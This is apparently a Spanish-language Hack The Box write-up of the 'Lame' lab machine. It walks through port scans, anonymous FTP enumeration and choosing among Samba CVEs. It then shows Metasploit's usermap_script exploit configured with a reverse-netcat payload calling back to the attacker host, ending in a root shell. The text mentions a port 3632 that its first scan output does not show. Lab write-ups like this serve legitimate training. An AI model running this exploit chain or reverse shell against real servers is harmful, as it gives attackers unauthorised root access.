Lame
Hack The Box — Metodología Detallada
Lame
| IP: | 10.129.18.177 |
| OS: | Linux |
| Dificultad: | Easy |
| Fecha: | 2 de julio de 2026 |
Reconocimiento
Escaneo inicial
Se realizó un escaneo completo de puertos para identificar todos los servicios expuestos en la máquina y determinar los posibles vectores de ataque disponibles.
# Comando ejecutado
sudo nmap -p- -sS --open --min-rate 5000 -vvv -n -Pn "$target_ip" -oG allPorts
# Output
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
Se realizó el escaneo, identificándose los puertos abiertos: 21 (FTP), 22 (SSH), 139/445 (Samba) y 3632 (distccd). Se procedió a realizar un escaneo de versiones sobre dichos servicios para determinar el vector de ataque principal.
# Comando
sudo nmap -sVC -p22,21,139,445,3632 10.129.18.177
# Output
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| Domain name: hackthebox.gr
|_ FQDN: lame.hackthebox.gr
Observación: Se identificó que el servicio FTP permitía inicio de sesión anónimo, además de contar con la versión vsftpd 2.3.4, conocida por una puerta trasera histórica. Por otro lado, el servicio Samba reportó la versión 3.0.20, también vulnerable a múltiples CVEs conocidos. Se decidió priorizar la investigación sobre Samba antes de continuar con FTP.
Enumeración de FTP anónimo
Se inició sesión en el servicio FTP utilizando credenciales anónimas para descartar la presencia de archivos de valor.
ftp [email protected]
Connected to 10.129.18.177.
220 (vsFTPd 2.3.4)
331 Please specify the password.
Password:
230 Login successful.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
Resultado: El directorio se encontraba vacío, sin archivos de interés.
Enumeración de Vulnerabilidades
Investigación inicial — CVE-2007-0454
Hipótesis: Al confirmarse la versión de Samba 3.0.20, se
investigó sobre vulnerabilidades asociadas, encontrándose el
CVE-2007-0454, una vulnerabilidad de cadena de formato en el módulo
VFS afsacl.so que permite ejecución de código arbitrario mediante
especificadores de cadena de formato en nombres de archivo sobre un
sistema de archivos AFS (Andrew File System).

Descarte: Tras analizar las condiciones de explotación de esta CVE, se determinó que requiere específicamente que el sistema cuente con AFS configurado como sistema de archivos, condición poco común que no parecía estar presente en este entorno. Se descartó esta vía y se procedió a buscar exploits públicos disponibles para la misma versión de Samba desde una perspectiva más amplia.
Identificación del exploit correcto
Se utilizó searchsploit para verificar la existencia de módulos de explotación públicos para Samba 3.0.20, encontrándose una vulnerabilidad distinta y más conocida.
Samba 3.0.20 < 3.0.25rc3 - 'Username map script' Command Execution (Metasploit)
unix/remote/16320.rb
Observación: Este exploit corresponde al CVE-2007-2447, conocido como “username map script”, una vulnerabilidad de inyección de comandos en la configuración de Samba que no requiere AFS ni condiciones especiales adicionales, convirtiéndolo en el vector correcto para esta máquina.
Explotación
Configuración del exploit en Metasploit
msf exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.129.18.177 yes The target host(s)
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.15.163 yes The listen address
LPORT 4444 yes The listen port
Ejecución del exploit
msf exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.15.163:4444
[*] Command shell session 1 opened (10.10.15.163:4444 -> 10.129.18.177:40744)
whoami
root
Resultado: El exploit otorgó acceso directo como root, sin
necesidad de una fase posterior de escalada de privilegios — la
vulnerabilidad explotada ejecuta comandos directamente con privilegios
máximos en el contexto del servicio Samba.
Reflexión Final
Qué salió bien
-
La mayor parte de la máquina resultó fluida. Se nota una mejora notable en el razonamiento y la metodología aplicada en comparación con máquinas anteriores.
-
Se priorizó correctamente el análisis de Samba frente a FTP al identificar una versión con vulnerabilidades conocidas asociadas.
-
Se utilizó
searchsploitde manera efectiva para descubrir un vector alternativo cuando la primera hipótesis no resultó aplicable.
Qué salió mal o costó más
- La principal dificultad fue determinar con certeza cuál CVE era el correcto a explotar. Se invirtió tiempo investigando el CVE-2007-0454 antes de descartarlo por sus condiciones específicas de explotación (requerir AFS configurado), lo cual no aplicaba al entorno presente.
Lecciones aprendidas
-
No toda CVE asociada a una versión de software es necesariamente explotable en el contexto específico de la máquina objetivo — es indispensable verificar las condiciones y prerrequisitos exactos de cada vulnerabilidad antes de invertir tiempo en su desarrollo.
-
searchsploites una herramienta efectiva para encontrar rápidamente el exploit público más relevante y verificado para una versión específica de software, complementando la investigación manual de CVEs. -
Algunas vulnerabilidades de Samba, como usermap_script, otorgan acceso directo como
rootsin requerir una fase adicional de escalada de privilegios, dado que el servicio se ejecuta con privilegios elevados por defecto.
Tiempo total
Tiempo total invertido en la resolución de la máquina: aproximadamente 40 minutos.